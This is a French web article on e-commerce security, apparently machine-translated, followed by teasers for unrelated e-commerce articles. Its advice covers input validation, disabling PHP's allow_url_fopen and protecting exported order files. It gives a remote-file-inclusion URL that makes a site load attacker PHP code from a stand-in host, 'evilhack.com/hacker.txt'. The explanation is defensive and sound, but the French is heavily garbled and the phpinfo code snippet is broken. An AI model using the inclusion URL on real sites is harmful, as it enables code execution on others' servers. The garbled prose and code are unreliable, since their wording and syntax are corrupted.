La sécurité dans un site e-commerce a besoin d'être un facteur important lorsqu'on crée un site e-commerce ou de logiciels. Un développeur a besoin d'être au courant de toutes les considérations de sécurité lors de la conception d'un site. Avec l'e-commerce devient de plus en plus courante de nos jours, le nombre des attaques de sécurité est certainement en augmentation. Paranoia est une chose saine pour les développeurs de site e-commerce, nous devons continuer jusqu'à la porte aux questions de sécurité et de garder nos oreilles et nos yeux ouverts. Bien que les lacunes suivantes sont graves, les lacunes suivantes si présentes sont facilement fixe.
Voici certaines des considérations de sécurité à prendre en compte lors de l'élaboration d'un site. Cet article ne couvre pas les e-vol à l'étalage, s'il vous plaît voir mon article distinct à ce sujet.
Les entrées d'utilisateur - chaque entrée, que ce soit d'entrer une quantité, à la recherche d'un produit, en entrant un nom, etc, doit être validée pour des personnages douteux. Si ce n'est pas fait, il est possible d'entrer "?>", les balises de fin de clôture de PHP et exécuter du code PHP.
Il est beaucoup plus sûr de permettre des chiffres et caractères az (chapiteaux inclus) et 0-9 et rien d'autre, plutôt que de faire une liste de tous les caractères qui ne devraient pas être là . Le script de validation des besoins pour faire défiler les caractères un par un. Cela doit être réalisé en utilisant la validation côté serveur, pas le Javascript. Utilisation de Validation côté serveur d'entrée est essentiel de conserver les caractères indésirables
Il existe une autre importante lors de l'exécution du code PHP. Lorsque vous utilisez PHP il ya un paramètre appelé allow_url_fopen qui permet l'ouverture de fichiers à partir d'un script PHP. Ce paramètre doit être désactivé, sauf si absolument nécessaire.
Imaginez vous avez des scripts PHP pour les deux têtes fixe et pieds de page et d'accéder à vos pages Web que vous taperez dans http://www.mysite.com/index.php?page=page2. Tout ce qu'il faut est un utilisateur malveillant d'exécuter un script en modifiant ces paramètres en tapant "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" avec un peu de code PHP dans le fichier "hacker.txt". Vous pourriez avoir quelque chose arriverait, PHP les fichiers, lire, supprimer, des informations vitales volées.
Si vous ne savez pas si ce paramètre est activé ou non, s'il vous plaît copiez le code PHP suivant dans un fichier texte, puis transférez-le sur votre serveur web:
phpinfo ();
?>
Lorsque vous accédez à votre script sur votre serveur, vous devriez trouver l'allow_url_fopen paramètre sous configuration.
Un utilisateur d'ordinateur, dans des circonstances normales ne peuvent pas trouver la valeur de ce paramètre.
Méfiez-vous des données exportées, comme les ordonnances, les produits en fichiers CSV et mySQL. Si ces données sont exportées à partir d'un script et est conservé sur le serveur Web dans une commune à savoir le nom du fichier. http://www.mysite.com/admin/output_tables.csv. Ce n'est vraiment un problème quand les données exportées réside dans un fichier dans un répertoire qui est accessible au public. Il ya deux façons d'empêcher cette faille de sécurité - d'abord avoir le fichier de sortie derrière un répertoire protégé par mot de passe, d'autre part disposer des données situées à l'intérieur un élément textarea formulaire HTML sur un script. Le commerçant peut ensuite copier ces informations du fichier texte et de créer un nouveau fichier sur leur ordinateur et coller les informations ici.
Tout ce qu'il faut est un hacker de trouver ce nom de fichier par consulter le site e-démo de logiciels de commerce électronique et cherchez le même nom sur un site réel.
Énumérés ci-dessous sont plus d'articles liés à l'article ci-dessus du "E-commerce" catégorie d'articles.
Les personnes intéressées dans l'article ci-dessus "E-Commerce Security - boucher les trous de sécurité» sont également intéressés dans les articles connexes énumérés ci-dessous:
Exécution d'une entreprise de commerce électronique n'est pas qu'une question de maintien de votre site web sur les rails. Les clients comptent sur votre capacité à les servir, par téléphone, fax, email, ou d'autres moyens, et il exige de chacun de vos systèmes de travailler pour pouvoir répondre aux demandes des clients.
Juste quelques jours en arrière, j'avais une conversation avec mon ami. Il était célèbre son 1er anniversaire du bébé et avait à courir entre son pays natal dans le Kerala et Chennai, son lieu de travail. Lui et sa moitié parcouru entre ces deux endroits au moins 4 fois dans durer un mois.
Si vous avez fait l'e-commerce pour un montant de temps, vous auriez dû savoir qu'il y scamers sont plus que des fournisseurs de services véritable dropship gros répertoire. Dans le monde du e-business, Salehoo et marques mondiales sont à la fois les fournisseurs de services de renom qui ont gagné en popularité ces dernières années.
Si vous avez déjà été un détaillant en ligne, vous avez probablement déjà entendu parler Salehoo ou même les utiliser à votre avantage. Si vous êtes à vos débuts avec votre entreprise, vous pourriez être confondu avec le Salehoo mixtes commentaires là -bas. Maintenant, jetons un oeil à ce que Salehoo est vraiment tout à propos et les services qu'ils proposent et qui bien tendance à négliger.
Combien de gens savent que vous avez acheté quelque chose en ligne? Si vous comme moi un certain nombre, c'est pourquoi le commerce électronique est le monde le nouveau centre commercial en ligne. Mais qui dirige ces magasins de détail en ligne? Des gens comme vous et moi, c'est pourquoi cette entreprise est en plein essor et continuera de le boom aujourd'hui et dans l'avenir.
Si vous êtes un grand fan des produits électroniques de pointe, vous pourriez être tenté par l'idée d'exploiter votre propre ligne du commerce électronique. Ce n'est pas que du mal à démarrer lorsque vous prenez le parti de la baisse de droite le service d'expédition des produits électroniques et il ya beaucoup à vous de choisir.
Avez-vous jamais dans votre dépanneur du coin et se demandent ce que ce serait comme si vous en étiez propriétaire? Souhaitez-vous être un bon propriétaire, la volonté du peuple comme vous? Eh bien cet article va vous montrer les avantages de posséder votre propre magasin de détail en ligne, ou communément appelé e-commerce qui diffère d'un vrai magasin du coin.
